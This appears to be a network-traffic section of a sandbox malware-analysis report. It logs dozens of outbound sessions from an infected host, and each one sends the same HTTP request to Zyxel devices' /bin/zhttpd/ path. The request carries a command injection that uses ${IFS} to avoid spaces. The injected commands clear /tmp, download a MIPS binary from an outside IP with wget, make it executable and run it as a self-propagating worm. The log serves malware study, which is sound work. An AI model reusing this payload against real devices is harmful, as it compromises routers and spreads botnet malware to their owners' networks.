                                          Jan 14, 2024 15:46:07.816087961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2321192.168.2.2336834108.243.21.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816092968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2322192.168.2.235275061.168.126.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816117048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2323192.168.2.234626214.153.255.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816138983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2324192.168.2.2335860194.76.251.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816169024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2325192.168.2.2345968192.127.14.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816188097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2326192.168.2.233610870.132.209.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816211939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2327192.168.2.235658847.158.157.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816239119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2328192.168.2.235994892.153.120.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816268921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2329192.168.2.2357004160.23.201.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816298008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2330192.168.2.2344206208.231.195.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816329956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2331192.168.2.233379261.188.12.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816340923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2332192.168.2.235343873.130.180.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816349983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2333192.168.2.2350306183.71.237.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816365957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2334192.168.2.234790468.34.159.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816380978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2335192.168.2.233969282.158.197.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816411972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2336192.168.2.2341088182.21.189.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816447973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2337192.168.2.235515867.183.78.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816485882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2338192.168.2.2345760201.110.228.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816512108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2339192.168.2.235686434.174.160.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816519976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2340192.168.2.2342656167.32.22.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816538095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2341192.168.2.234714247.98.168.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816574097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2342192.168.2.233436686.4.254.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816596985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2343192.168.2.2336112101.187.250.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816628933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2344192.168.2.2332878202.112.183.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816662073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2345192.168.2.2359310129.28.234.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816679001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2346192.168.2.2335980131.27.252.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816695929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2347192.168.2.2337726129.129.52.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816726923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2348192.168.2.2338620175.126.191.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816764116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2349192.168.2.233291492.107.171.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816776037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2350192.168.2.2354744210.105.240.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816778898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2351192.168.2.2349312192.229.106.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816833019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2352192.168.2.234126887.44.166.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816858053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2353192.168.2.2355802155.12.100.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816879988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2354192.168.2.234941641.149.141.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816893101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2355192.168.2.2338112114.252.198.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816906929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2356192.168.2.2353478195.66.46.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816922903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2357192.168.2.2349890152.83.140.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816967964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2358192.168.2.234260494.27.24.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816982031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2359192.168.2.235303245.6.236.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.816999912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2360192.168.2.2349908104.12.199.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817008018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2361192.168.2.23495009.221.135.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817049026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2362192.168.2.234543698.120.99.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817060947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2363192.168.2.2341958186.186.39.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817074060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2364192.168.2.2343850128.219.202.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817095995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2365192.168.2.234836625.87.175.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817115068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2366192.168.2.235621887.128.252.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817130089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2367192.168.2.2335230217.24.122.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817152023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2368192.168.2.2336696136.163.80.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817203045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2369192.168.2.235835270.48.1.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817212105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2370192.168.2.2333544185.27.31.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817233086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2371192.168.2.2346312135.143.43.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817251921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2372192.168.2.2360846132.82.198.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817270041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2373192.168.2.2340984168.28.28.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817291021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2374192.168.2.2359954186.233.181.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817317963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2375192.168.2.235544488.133.88.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817370892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2376192.168.2.2355396209.139.71.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817377090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2377192.168.2.2338944109.62.238.97443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817399025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2378192.168.2.2356500217.243.145.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817410946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2379192.168.2.2333700145.71.114.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817418098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2380192.168.2.235139694.54.55.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817452908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2381192.168.2.235840063.81.124.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817498922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2382192.168.2.234191812.101.197.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:07.817498922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2383192.168.2.2341870206.100.255.139443
                                          TimestampBytes transferredDirectionData
